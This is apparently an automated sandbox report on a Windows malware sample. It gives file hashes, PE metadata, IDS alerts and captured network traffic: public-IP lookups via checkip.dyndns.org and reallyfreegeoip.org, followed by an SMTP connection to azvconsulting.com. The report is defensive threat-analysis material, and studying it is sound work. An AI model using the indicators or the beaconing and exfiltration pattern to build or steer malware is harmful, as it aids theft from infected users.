                          SHA512:5497d51a7fd3bd96088f7d70cd3b8f204a9d1840dc58422e68b03022222ccf89e4b844d9e795c5f511fbcdd2391faf42aa177f234e1f456c7eff181565d2e406
                          SSDEEP:12288:r23MMXEjLA7SM50UeSx9q2S5RB4ZBCErR4ylFayRPODJvEtDV:JLA7EqfSUZBCqfbaRJM
                          TLSH:FAD412986A68CB16D5D217B45A60E7341779AE8EF812D20B8FEE7CDB7C36B044900773
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...pXV..........."...0.................. .....@..... .......................@............@...@......@............... .....

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x140000000
                          Entrypoint Section:
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xB3565870 [Tue May 5 20:20:00 2065 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:

                          Entrypoint Preview

                          Instruction
                          dec ebp
                          pop edx
                          nop
                          add byte ptr [ebx], al
                          add byte ptr [eax], al
                          add byte ptr [eax+eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x5bc.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9fbe40x70.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x9f83c0x9fa0001721a60170b8f06d6a4aae3c4196410False0.9048872479444009data7.66181548748652IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xa20000x5bc0x6008482042ac132889b22b859176ba24936False0.4225260416666667data4.093280562026085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0xa20900x32cdata0.42980295566502463
                          RT_MANIFEST0xa23cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-23T16:01:34.492664+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.130.080TCP
                          2024-10-23T16:01:35.633309+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.130.080TCP
                          2024-10-23T16:01:36.356933+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549709188.114.97.3443TCP
                          2024-10-23T16:01:37.086424+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549710193.122.130.080TCP
                          2024-10-23T16:01:38.555166+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549713193.122.130.080TCP
                          2024-10-23T16:01:42.411660+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549719188.114.97.3443TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 23, 2024 16:01:33.610846043 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:33.616219044 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:33.616308928 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:33.690742016 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:33.696125031 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:34.278034925 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:34.285537958 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:34.291081905 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:34.442698956 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:34.475548983 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:34.475570917 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:34.475627899 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:34.487638950 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:34.487651110 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:34.492664099 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:35.106240988 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.106336117 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.112886906 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.112912893 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.113182068 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.164561987 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.173782110 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.215331078 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.341779947 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.342036009 CEST44349707188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.343326092 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.365000010 CEST49707443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.428318977 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:35.433799028 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:35.586070061 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:35.589140892 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.589174986 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.589255095 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.589618921 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:35.589627981 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:35.633308887 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.208636045 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:36.211309910 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:36.211338997 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:36.356940031 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:36.357106924 CEST44349709188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:36.357166052 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:36.360896111 CEST49709443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:36.364710093 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.365850925 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.370472908 CEST8049706193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:36.370668888 CEST4970680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.372175932 CEST8049710193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:36.372420073 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.372581005 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:36.378246069 CEST8049710193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.046224117 CEST8049710193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.047979116 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048005104 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.048094988 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048424006 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.048434019 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.086424112 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.668328047 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.669713974 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.669730902 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820276022 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820352077 CEST44349712188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:37.820466995 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.821106911 CEST49712443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:37.825218916 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.826334000 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.831163883 CEST8049710193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.831372023 CEST4971080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.831873894 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:37.831989050 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.832098007 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:37.837810040 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:38.509852886 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:38.511770964 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.511816025 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:38.511885881 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.512265921 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:38.512291908 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:38.555166006 CEST4971380192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.146176100 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.156038046 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.156075001 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.297780991 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.298017025 CEST44349715188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.298084974 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.298613071 CEST49715443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.303621054 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.309202909 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.309305906 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.309393883 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:39.314762115 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.985116005 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:39.987135887 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987170935 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:39.987258911 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987644911 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:39.987659931 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.039558887 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:40.630409002 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.635473967 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.635504007 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990469933 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990560055 CEST44349717188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:40.990751028 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.991833925 CEST49717443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:40.996474028 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:40.997916937 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003510952 CEST8049716193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.003598928 CEST4971680192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003637075 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.003742933 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.003918886 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:41.009319067 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.658071041 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:41.659616947 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.659691095 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:41.659775972 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.660334110 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:41.660368919 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:41.711450100 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.268120050 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.269793034 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.269870996 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.411731958 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.411879063 CEST44349719188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:42.412026882 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.412939072 CEST49719443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:42.416882038 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.418144941 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.422593117 CEST8049718193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:42.422681093 CEST4971880192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.423984051 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:42.424067020 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.424170971 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:42.429467916 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.090066910 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.091892958 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.091933012 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.092005014 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.092312098 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.092333078 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.133335114 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.711544037 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.713272095 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.713296890 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.857877970 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.858094931 CEST44349721188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:43.858203888 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.858807087 CEST49721443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:43.862483025 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.863539934 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.869175911 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.869364023 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.869554043 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:43.874990940 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.899662971 CEST8049720193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:43.899739981 CEST4972080192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:44.558108091 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:44.559967041 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560000896 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:44.560069084 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560350895 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:44.560364962 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:44.602063894 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:46.196131945 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.198041916 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:46.198067904 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345122099 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345392942 CEST44349723188.114.97.3192.168.2.5
                          Oct 23, 2024 16:01:46.345560074 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:46.349195957 CEST49723443192.168.2.5188.114.97.3
                          Oct 23, 2024 16:01:51.679375887 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:51.685400963 CEST8049722193.122.130.0192.168.2.5
                          Oct 23, 2024 16:01:51.685465097 CEST4972280192.168.2.5193.122.130.0
                          Oct 23, 2024 16:01:51.765368938 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:51.770831108 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:51.770991087 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.697479010 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.698625088 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.703999996 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.950872898 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:52.953181982 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:52.958489895 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.204345942 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.204699993 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.210180998 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.485181093 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.486671925 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.493563890 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.738452911 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.738666058 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:53.744149923 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.991113901 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:53.995760918 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:01:54.001668930 CEST58749741185.14.58.143192.168.2.5
                          Oct 23, 2024 16:01:54.001739025 CEST49741587192.168.2.5185.14.58.143
                          Oct 23, 2024 16:02:43.546772003 CEST8049713193.122.130.0192.168.2.5
                          Oct 23, 2024 16:02:43.546838999 CEST4971380192.168.2.5193.122.130.0

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 23, 2024 16:01:33.580614090 CEST6258153192.168.2.51.1.1.1
                          Oct 23, 2024 16:01:33.588741064 CEST53625811.1.1.1192.168.2.5
                          Oct 23, 2024 16:01:34.466450930 CEST5653953192.168.2.51.1.1.1
                          Oct 23, 2024 16:01:34.474248886 CEST53565391.1.1.1192.168.2.5
                          Oct 23, 2024 16:01:51.681301117 CEST6271053192.168.2.51.1.1.1
                          Oct 23, 2024 16:01:51.762362957 CEST53627101.1.1.1192.168.2.5
                          Oct 23, 2024 16:02:04.431243896 CEST6427153192.168.2.51.1.1.1
                          Oct 23, 2024 16:02:04.516516924 CEST53642711.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 23, 2024 16:01:33.580614090 CEST192.168.2.51.1.1.10x4635Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:34.466450930 CEST192.168.2.51.1.1.10x8663Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:51.681301117 CEST192.168.2.51.1.1.10x527eStandard query (0)azvconsulting.comA (IP address)IN (0x0001)false
                          Oct 23, 2024 16:02:04.431243896 CEST192.168.2.51.1.1.10x7680Standard query (0)azvconsulting.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:33.588741064 CEST1.1.1.1192.168.2.50x4635No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:34.474248886 CEST1.1.1.1192.168.2.50x8663No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:34.474248886 CEST1.1.1.1192.168.2.50x8663No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:01:51.762362957 CEST1.1.1.1192.168.2.50x527eNo error (0)azvconsulting.com185.14.58.143A (IP address)IN (0x0001)false
                          Oct 23, 2024 16:02:04.516516924 CEST1.1.1.1192.168.2.50x7680No error (0)azvconsulting.com185.14.58.143A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • reallyfreegeoip.org
                          • checkip.dyndns.org

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549706193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:33.690742016 CEST151OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Oct 23, 2024 16:01:34.278034925 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:34 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 27b89f50fd9bdabcd77f7f106bb65ca9
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                          Oct 23, 2024 16:01:34.285537958 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:34.442698956 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:34 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: e4909db3900ade3349ac57f8afb0e991
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                          Oct 23, 2024 16:01:35.428318977 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:35.586070061 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:35 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d5de3491bb87663073b562fc4c958446
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.549710193.122.130.0804304C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          TimestampBytes transferredDirectionData
                          Oct 23, 2024 16:01:36.372581005 CEST127OUTGET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Oct 23, 2024 16:01:37.046224117 CEST323INHTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:36 GMT
                          Content-Type: text/html
                          Content-Length: 106
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 2f6186f3d95683ac9a7d5d146833e766
                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
